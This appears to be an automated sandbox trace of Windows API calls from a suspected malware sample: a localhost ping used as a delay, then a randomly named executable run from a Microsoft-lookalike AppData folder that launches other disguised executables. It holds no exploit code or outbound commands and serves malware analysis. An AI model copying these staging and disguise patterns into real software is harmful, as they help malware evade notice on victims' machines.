os_tid = 0xc00 [0099.195] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f954 | out: lpSystemTimeAsFileTime=0x22f954*(dwLowDateTime=0x79229820, dwHighDateTime=0x1d440a9)) [0099.195] 
GetCurrentProcessId () returned 0xbfc [0099.195] GetCurrentThreadId () returned 0xc00 [0099.195] GetTickCount () returned 0x23b1c [0099.195] QueryPerformanceCounter (in: lpPerformanceCount=0x22f94c | out: lpPerformanceCount=0x22f94c*=15598383572) returned 1 [0099.195] GetModuleHandleA (lpModuleName=0x0) returned 0x1c0000 [0099.195] __set_app_type (_Type=0x1) [0099.195] __p__fmode () returned 0x76b331f4 [0099.195] __p__commode () returned 0x76b331fc [0099.195] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1c2ae1) returned 0x0 [0099.195] __getmainargs (in: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8, _DoWildCard=0, _StartInfo=0x1c50e8 | out: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8) returned 0 [0099.195] SetThreadUILanguage (LangId=0x0) returned 0x409 [0099.196] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.196] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x1c5440 | out: lpWSAData=0x1c5440) returned 0 [0099.201] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x22f3e4 | out: phkResult=0x22f3e4*=0x58) returned 0x0 [0099.201] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x22f3d8, lpData=0x22f3e0, lpcbData=0x22f3dc*=0x4 | out: lpType=0x22f3d8*=0x0, lpData=0x22f3e0*=0x0, lpcbData=0x22f3dc*=0x4) returned 0x2 [0099.201] RegCloseKey (hKey=0x58) returned 0x0 [0099.201] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x22f3ac*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x22f3d4 | out: ppResult=0x22f3d4*=0x0) returned 11001 [0099.201] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x22f3ac*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x22f3d4 | out: 
ppResult=0x22f3d4*=0x2e46f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x2e47b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2e47e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2e3a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0099.913] FreeAddrInfoW (pAddrInfo=0x2e46f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x2e47b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2e47e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2e3a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0099.913] Icmp6CreateFile () returned 0x2e8b40 [0100.103] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2e4830 [0100.103] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x2eebb0 [0100.103] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f8d4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0100.103] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x22f3d4, nSize=0x0, Arguments=0x22f3d0 | out: lpBuffer="XH.") returned 0x19 [0100.104] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x2e4858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0100.104] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.104] _write (in: _FileHandle=1, _Buf=0x2e4858*, _MaxCharCount=0x19 | out: _Buf=0x2e4858*) returned 25 [0100.104] _setmode 
(_FileHandle=1, _Mode=16384) returned 32768 [0100.104] LocalFree (hMem=0x2e4858) returned 0x0 [0100.104] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x22f3d8, nSize=0x0, Arguments=0x22f3d4 | out: lpBuffer="XH.") returned 0x18 [0100.104] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x2e4858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0100.104] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.104] _write (in: _FileHandle=1, _Buf=0x2e4858*, _MaxCharCount=0x18 | out: _Buf=0x2e4858*) returned 24 [0100.105] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.105] LocalFree (hMem=0x2e4858) returned 0x0 [0100.105] SetConsoleCtrlHandler (HandlerRoutine=0x1c17ca, Add=1) returned 1 [0100.105] Icmp6SendEcho2 (in: IcmpHandle=0x2e8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22f450, DestinationAddress=0x1c55e0, RequestData=0x2e4830, RequestSize=0x20, RequestOptions=0x22f400, ReplyBuffer=0x2eebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2eebb0) returned 0x1 [0100.106] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f8d4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0100.106] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f3d8, nSize=0x0, Arguments=0x22f3d4 | out: lpBuffer=" Q.") returned 0x10 [0100.106] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2e5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0100.106] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.106] _write (in: _FileHandle=1, _Buf=0x2e5120*, _MaxCharCount=0x10 | out: _Buf=0x2e5120*) returned 16 [0100.106] _setmode (_FileHandle=1, _Mode=16384) 
returned 32768 [0100.107] LocalFree (hMem=0x2e5120) returned 0x0 [0100.107] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f3dc, nSize=0x0, Arguments=0x22f3d8 | out: lpBuffer="\x10<.") returned 0x9 [0100.107] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2e3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0100.107] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.107] _write (in: _FileHandle=1, _Buf=0x2e3c10*, _MaxCharCount=0x9 | out: _Buf=0x2e3c10*) returned 9 [0100.107] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.107] LocalFree (hMem=0x2e3c10) returned 0x0 [0100.107] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f3dc, nSize=0x0, Arguments=0x22f3d8 | out: lpBuffer=" \x8f.") returned 0x2 [0100.107] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2e8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0100.107] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.107] _write (in: _FileHandle=1, _Buf=0x2e8f20*, _MaxCharCount=0x2 | out: _Buf=0x2e8f20*) returned 2 [0100.107] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.107] LocalFree (hMem=0x2e8f20) returned 0x0 [0100.107] Sleep (dwMilliseconds=0x3e8) [0101.177] Icmp6SendEcho2 (in: IcmpHandle=0x2e8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22f450, DestinationAddress=0x1c55e0, RequestData=0x2e4830, RequestSize=0x20, RequestOptions=0x22f400, ReplyBuffer=0x2eebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2eebb0) returned 0x1 [0101.347] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f8d4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0101.347] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, 
dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f3d8, nSize=0x0, Arguments=0x22f3d4 | out: lpBuffer=" Q.") returned 0x10 [0101.348] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2e5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0101.348] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.348] _write (in: _FileHandle=1, _Buf=0x2e5120*, _MaxCharCount=0x10 | out: _Buf=0x2e5120*) returned 16 [0101.348] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.348] LocalFree (hMem=0x2e5120) returned 0x0 [0101.348] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f3dc, nSize=0x0, Arguments=0x22f3d8 | out: lpBuffer="\x10<.") returned 0x9 [0101.348] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2e3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0101.348] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.348] _write (in: _FileHandle=1, _Buf=0x2e3c10*, _MaxCharCount=0x9 | out: _Buf=0x2e3c10*) returned 9 [0101.348] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.348] LocalFree (hMem=0x2e3c10) returned 0x0 [0101.348] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f3dc, nSize=0x0, Arguments=0x22f3d8 | out: lpBuffer=" \x8f.") returned 0x2 [0101.348] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2e8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0101.348] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.348] _write (in: _FileHandle=1, _Buf=0x2e8f20*, _MaxCharCount=0x2 | out: _Buf=0x2e8f20*) returned 2 [0101.348] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.348] LocalFree (hMem=0x2e8f20) returned 0x0 [0101.348] Sleep (dwMilliseconds=0x3e8) [0102.393] Icmp6SendEcho2 (in: IcmpHandle=0x2e8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22f450, DestinationAddress=0x1c55e0, RequestData=0x2e4830, RequestSize=0x20, RequestOptions=0x22f400, 
ReplyBuffer=0x2eebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2eebb0) returned 0x1 [0102.565] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f8d4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0102.565] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f3d8, nSize=0x0, Arguments=0x22f3d4 | out: lpBuffer=" Q.") returned 0x10 [0102.565] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2e5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0102.565] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.565] _write (in: _FileHandle=1, _Buf=0x2e5120*, _MaxCharCount=0x10 | out: _Buf=0x2e5120*) returned 16 [0102.565] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.565] LocalFree (hMem=0x2e5120) returned 0x0 [0102.565] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0x22f3d8, nSize=0x0, Arguments=0x22f3d4 | out: lpBuffer="\x10<.") returned 0x9 [0102.565] CharToOemBuffA (in: lpszSrc="time=5ms ", lpszDst=0x2e3c10, cchDstLength=0x9 | out: lpszDst="time=5ms ") returned 1 [0102.565] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.565] _write (in: _FileHandle=1, _Buf=0x2e3c10*, _MaxCharCount=0x9 | out: _Buf=0x2e3c10*) returned 9 [0102.565] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.565] LocalFree (hMem=0x2e3c10) returned 0x0 [0102.565] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f3dc, nSize=0x0, Arguments=0x22f3d8 | out: lpBuffer=" \x8f.") returned 0x2 [0102.565] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2e8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0102.565] _setmode (_FileHandle=1, _Mode=32768) 
returned 16384 [0102.565] _write (in: _FileHandle=1, _Buf=0x2e8f20*, _MaxCharCount=0x2 | out: _Buf=0x2e8f20*) returned 2 [0102.566] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.566] LocalFree (hMem=0x2e8f20) returned 0x0 [0102.566] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f3a0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0102.566] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x22f370, nSize=0x0, Arguments=0x22f36c | out: lpBuffer="\xd0\x14\x2f") returned 0x56 [0102.566] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x2f14d0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0102.566] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.566] _write (in: _FileHandle=1, _Buf=0x2f14d0*, _MaxCharCount=0x56 | out: _Buf=0x2f14d0*) returned 86 [0102.566] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.566] LocalFree (hMem=0x2f14d0) returned 0x0 [0102.566] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x22f380, nSize=0x0, Arguments=0x22f37c | out: lpBuffer="\xe8\x14\x2f") returned 0x61 [0102.566] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 5ms, Average = 1ms\r\n", lpszDst=0x2f14e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 5ms, Average = 1ms\r\n") returned 1 [0102.566] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.566] _write (in: _FileHandle=1, _Buf=0x2f14e8*, _MaxCharCount=0x61 | out: _Buf=0x2f14e8*) 
returned 97 [0102.566] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.566] LocalFree (hMem=0x2f14e8) returned 0x0 [0102.566] IcmpCloseHandle (IcmpHandle=0x2e8b40) returned 1 [0102.753] LocalFree (hMem=0x2e4830) returned 0x0 [0102.753] LocalFree (hMem=0x2eebb0) returned 0x0 [0102.753] WSACleanup () returned 0 [0102.908] exit (_Code=0) Thread: id = 35 os_tid = 0xc20 Thread: id = 37 os_tid = 0xc30 Thread: id = 38 os_tid = 0xc34 Process: id = "24" image_name = "sypykbck.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe" page_root = "0x7ea16940" os_pid = "0xc0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0xb68" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1527 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1528 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1529 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1530 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "sypykbck.exe" filename = 
"\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe") Region: id = 1531 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1532 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1533 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1534 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1535 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1536 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1537 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1538 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1539 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1540 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1541 start_va = 
0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1542 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1543 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1544 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1545 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1546 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1547 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1548 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1549 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1550 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = 
"\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1582 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1583 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1584 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1585 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1586 start_va = 0x11a0000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1662 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1663 start_va = 0x11a0000 end_va = 0x125ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1664 start_va = 0x1390000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x0000000001390000" filename = "" Region: id = 1710 start_va = 0x1260000 end_va = 0x133efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 1711 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1712 start_va = 0x150000 end_va = 0x152fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1713 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = 
"private_0x0000000000150000" filename = "" Thread: id = 33 os_tid = 0xc10 [0099.362] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x793a65e0, dwHighDateTime=0x1d440a9)) [0099.362] GetCurrentProcessId () returned 0xc0c [0099.362] GetCurrentThreadId () returned 0xc10 [0099.362] GetTickCount () returned 0x23bb8 [0099.362] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=15615159413) returned 1 [0099.363] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0099.363] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.363] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0099.363] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0099.363] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0099.363] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0099.364] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0099.365] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0099.365] GetCurrentThreadId () returned 0xc10 [0099.365] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13907d0)) [0099.366] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0099.366] GetFileType (hFile=0x3) returned 0x0 [0099.366] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.366] GetFileType (hFile=0x7) returned 0x0 [0099.366] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0099.366] GetFileType (hFile=0xb) returned 0x0 [0099.366] SetHandleCount (uNumber=0x20) returned 0x20 [0099.366] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0099.366] GetEnvironmentStringsW () returned 0x1afd68* [0099.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0099.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x13911f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", 